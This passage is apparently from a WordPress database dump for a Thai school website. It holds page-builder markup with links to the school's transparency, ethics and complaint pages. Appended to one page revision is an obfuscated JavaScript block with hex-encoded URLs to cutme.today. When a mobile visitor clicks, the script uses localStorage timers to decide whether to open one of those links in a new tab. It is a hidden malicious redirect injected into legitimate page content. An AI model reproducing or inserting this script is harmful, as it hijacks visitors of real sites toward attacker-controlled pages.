class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 12:53:22','2024-08-20 05:53:22','',871,'http://pakhaeng.ssk.in.th/?p=1001',0,'revision','',0),
(1002,1,'2024-08-20 13:03:43','2024-08-20 06:03:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 